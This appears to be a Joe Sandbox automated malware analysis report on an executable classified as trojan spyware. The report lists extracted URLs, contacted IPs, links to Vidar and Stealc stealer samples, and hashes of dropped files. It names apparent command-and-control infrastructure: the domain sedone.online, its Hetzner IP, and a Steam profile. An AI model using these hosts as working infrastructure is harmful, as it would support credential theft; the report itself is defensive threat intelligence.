                                                                                                                                                                            http://anglebug.com/7556chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1554280885.000078240221C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.0dZKPE9gotO.exe, 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://chromewebstore.google.com/chrome.exe, 0000000A.00000002.1560599146.000078240238C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000002.1683403996.000039980238C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.15.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://sedone.online/pWdZKPE9gotO.exe, 00000000.00000003.1416494529.0000000000AB5000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000003.1440528532.0000000000AB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgdZKPE9gotO.exe, 00000000.00000002.2207976235.0000000003EF1000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000002.2206788011.0000000003B9B000.00000004.00000020.00020000.00000000.sdmp, AIWTJM.0.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://sedone.online/oWF#dZKPE9gotO.exe, 00000000.00000003.1416494529.0000000000AB5000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000003.1393466949.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000003.1440528532.0000000000AB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://clients4.google.com/chrome-syncchrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://sedone.onlinedZKPE9gotO.exe, 00000000.00000002.2205161223.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/$chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 0000000D.00000003.1612331110.0000399802480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://anglebug.com/6692chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://issuetracker.google.com/258207403msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://anglebug.com/3502chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://anglebug.com/3623msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://www.office.com79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://anglebug.com/3625msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://outlook.live.com/mail/0/79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://anglebug.com/3624msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://docs.google.com/presentation/Jchrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://anglebug.com/5007chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 0000000A.00000002.1561830253.0000782402594000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://anglebug.com/3862chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://chrome.google.com/webstoreLDDiscoverchrome.exe, 0000000A.00000003.1486986919.0000782402F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1481279735.0000782402E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1481327210.0000782402E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487889087.0000782402E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1489388170.0000782402F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562044896.000078240264B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482998939.0000782402F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487869153.000078240253C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1481562325.0000782402F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1484398172.0000782402F40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://www.ecosia.org/search?q=&addon=opensearchchrome.exe, 0000000A.00000002.1565586304.0000782402D58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://anglebug.com/4836chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://issuetracker.google.com/issues/166475273msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://ch.search.yahoo.com/favicon.icochrome.exe, 0000000A.00000002.1565639371.0000782402D70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://docs.google.com/presentation/:chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
IP | Domain | Country | ASN | ASN Name | Malicious
23.33.40.139 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
23.219.82.75 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
116.203.12.114 | sedone.online | Germany | 24940 | HETZNER-ASDE | false
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
162.159.61.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false
150.171.28.10 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
172.217.21.36 | www.google.com | United States | 15169 | GOOGLEUS | false
20.110.205.119 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
23.58.157.24 | unknown | United States | 22773 | ASN-CXA-ALL-CCI-22773-RDCUS | false
204.79.197.219 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
142.250.181.65 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
18.173.219.84 | unknown | United States | 3 | MIT-GATEWAYSUS | false
172.64.41.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false
13.69.239.72 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
23.33.40.153 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
                                                                                                                                                                                                                                  IP
                                                                                                                                                                                                                                  192.168.2.7
                                                                                                                                                                                                                                  127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576158
Start date and time: 2024-12-16 15:38:29 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: dZKPE9gotO.exe (renamed because original name is a hash value)
Original Sample Name: 876a365bda09b9ef39605e375d677f0a.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@69/287@22/18
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: dZKPE9gotO.exe
Time | Type | Description
11:08:25 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
23.33.40.139 | file.exe | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar |
23.33.40.139 | https://www.google.md/url?url=https://demeropkdfzdbi&uxzs=zemleptc&icmeyuc=zn0&ywprgz=icmeyuc&uxzs=zemleptc&ywprgz=icmeyuc&fzdbi=demeropkd&znzn=ywprgzuxzs&q=amp%2Fdecentafrica.com%2Flok%2F1160851136%2FZHVzdGluLmZpY2NvQHZvc3Nsb2guY29t | malicious | Unknown |
23.219.82.75 | file.exe | malicious | Stealc, Vidar |
23.219.82.75 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc |
116.203.12.114 | nB52P46OJD.exe | malicious | Vidar |
116.203.12.114 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar |
116.203.12.114 | T0x859fNfn.exe | malicious | Vidar |
149.154.167.99 | http://xn--r1a.website/s/ogorodru | malicious | Unknown | telegram.org/img/favicon.ico
149.154.167.99 | http://cryptorabotakzz.com/ | malicious | Unknown | telegram.org/
149.154.167.99 | http://cache.netflix.com.id1.wuush.us.kg/ | malicious | Unknown | telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
149.154.167.99 | http://investors.spotify.com.sg2.wuush.us.kg/ | malicious | Unknown | telegram.org/
149.154.167.99 | http://bekaaviator.kz/ | malicious | Unknown | telegram.org/
149.154.167.99 | http://telegramtw1.org/ | malicious | Unknown | telegram.org/?setln=pl
149.154.167.99 | http://makkko.kz/ | malicious | Unknown |
                                                                                                                                                                                                                                                • telegram.org/
                                                                                                                                                                                                                                                http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • telegram.dog/
                                                                                                                                                                                                                                                LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                • t.me/cinoshibot
                                                                                                                                                                                                                                                jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                • t.me/cinoshibot
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                • 2.16.158.75
                                                                                                                                                                                                                                                T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 23.209.72.33
                                                                                                                                                                                                                                                https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                • 104.126.36.32
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 204.237.205.123
                                                                                                                                                                                                                                                bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                • 95.100.100.165
                                                                                                                                                                                                                                                bot.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                • 95.100.100.171
                                                                                                                                                                                                                                                bot.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                • 95.100.100.142
                                                                                                                                                                                                                                                armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 2.21.22.15
                                                                                                                                                                                                                                                HETZNER-ASDEdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 188.40.187.161
                                                                                                                                                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 188.40.187.161
                                                                                                                                                                                                                                                nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 188.40.187.161
                                                                                                                                                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 188.40.187.161
                                                                                                                                                                                                                                                ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                • 159.69.249.103
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                InvoiceNr274728.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 94.130.137.154
                                                                                                                                                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 188.40.187.161
                                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                                                Entropy (8bit):1.236158375923585
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:mpImVYD8+r0JhH0fjOjuLZr0gfsCGHzuiFFZ24IO8oEGm:tDyJhH0ijrRdzuiFFY4IO8y
                                                                                                                                                                                                                                                MD5:00CAB52D2870A93D4D102FC51CDFE5B5
                                                                                                                                                                                                                                                SHA1:36208AFB63912DBF5C9DCDA25217C02B11F3DA3C
                                                                                                                                                                                                                                                SHA-256:0F0EF8E955A286B4D16B4307347048CA4A61DA8036C837039B1FC9A1B6A0412C
                                                                                                                                                                                                                                                SHA-512:81173480DCCA252E712780AD338CB367EE88C2CED2ACB4BF357B5ED1DF6153659E5180ACEFAF0611B59ACC294ABE8F39D4D2C724D28FAB3224AC33ECA12E5A54
                                                                                                                                                                                                                                                Malicious:true
Preview:Version=1 EventType=APPCRASH EventTime=133788389002275823 ReportType=2 Consent=1 UploadTime=133788389008525733 ReportStatus=655456 ReportIdentifier=232513c3-0a90-46f7-ac5c-080fa1c4c3f2 IntegratorReportIdentifier=a8d6cf34-ff9c-4733-85e8-86760a8b1e6a Wow64Host=34404 Wow64Guest=332 NsAppName=dZKPE9gotO.exe AppSessionGuid=000007d0-0001-0014-537d-4a4dc84fdb01 TargetAppId=W:000654d599f6d66b0f4d5e44e603e2ad25520000ffff!00002c12b38ed2d84722cf5dcea8bd45cfa7d7b55ba4!dZKPE9gotO.exe TargetApp
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:08:20 2024, 0x1205a4 type
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):108166
                                                                                                                                                                                                                                                Entropy (8bit):2.145769887427562
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:buEFVBKJkrE3Q9FIi9WwmpJLiC+gUaqhCpB6Ss/z42lqUpNfxh:bLFvGkrE3Ri9W7pJLnL61ZZlqs5
                                                                                                                                                                                                                                                MD5:86CBD56990E5479AC1CD1013E7AB4024
                                                                                                                                                                                                                                                SHA1:B0DA21B51A57594240CF52ECA95B10BEB5D18255
                                                                                                                                                                                                                                                SHA-256:08311042A74532438F83E988E0A554204127FABC958372C04670C0888D9E88BF
                                                                                                                                                                                                                                                SHA-512:42FA6CD5E94A52A2D6526817556C6600F45E8CEB10F53EB3B628BA3A6EAFBED9DA5A4C6F7F8946F4FB28A799B50C71CE161D6A3083E0A779A4B9882EA90CA5B2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8336
                                                                                                                                                                                                                                                Entropy (8bit):3.695547320592409
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:R6l7wVeJblz6KV6YNQgSU9QgmfiijVjcpDM89b3vsf19m:R6lXJN6Y6YugSU9QgmfzVjI3UfO
                                                                                                                                                                                                                                                MD5:D4292D55DDB140CD8C8F28698122E58A
                                                                                                                                                                                                                                                SHA1:33EB17D4EB5F5E3B901F8071F109430C53A5DA66
                                                                                                                                                                                                                                                SHA-256:04869C9BE40EEAF9A84835E88203F7B335A5C8A32A55A78F7F111CDE7D171D62
                                                                                                                                                                                                                                                SHA-512:DEB9467F33F2F667A739511888F59D2408885A1EEDBA3AA3F3B476B02DFE512CEEFFF81959935CAD18079966BD709450DD5F645D38442230754D9B1BBFE06AAB
                                                                                                                                                                                                                                                Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>2000</Pi
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4579
                                                                                                                                                                                                                                                Entropy (8bit):4.474839597040731
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zspJg77aI9SlWpW8VYAYm8M4Jp3HFte+q8Kn2TbyVd:uIjf7I7EU7VQJp26vyVd
                                                                                                                                                                                                                                                MD5:DD71441ECD958A26F68D5ED43463C252
                                                                                                                                                                                                                                                SHA1:06C5750E4035A35B8A5C1D2FB0CFC49DECC1A266
                                                                                                                                                                                                                                                SHA-256:A8027675E2BAF15D98BD8149320A75D308453048B681A3DBB7C6290A36518835
                                                                                                                                                                                                                                                SHA-512:025DD100D154272973EE45633F7B610C4A7700540774ABA784304762E45FE9CD57F767855F2EB1A2318317FBDF771D15B98E1F02AD06DDE294B3FD7F5375D439
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634031" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.691266297898928
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                                                                                                                                                                MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                                                                                                                                                                SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                                                                                                                                                                SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                                                                                                                                                                SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.698999446679606
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
                                                                                                                                                                                                                                                MD5:73351F70BFEF33BEEA9E1CC192801D02
                                                                                                                                                                                                                                                SHA1:ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
                                                                                                                                                                                                                                                SHA-256:F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
                                                                                                                                                                                                                                                SHA-512:56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1769), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9370
                                                                                                                                                                                                                                                Entropy (8bit):5.514140640374404
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
                                                                                                                                                                                                                                                MD5:7E44458E0A8A3A7D10875BC3B7AE72D1
                                                                                                                                                                                                                                                SHA1:E5E6AC8676EE3761DAB13A10EB7573C19F48D297
                                                                                                                                                                                                                                                SHA-256:21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
                                                                                                                                                                                                                                                SHA-512:012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
                                                                                                                                                                                                                                                Malicious:false
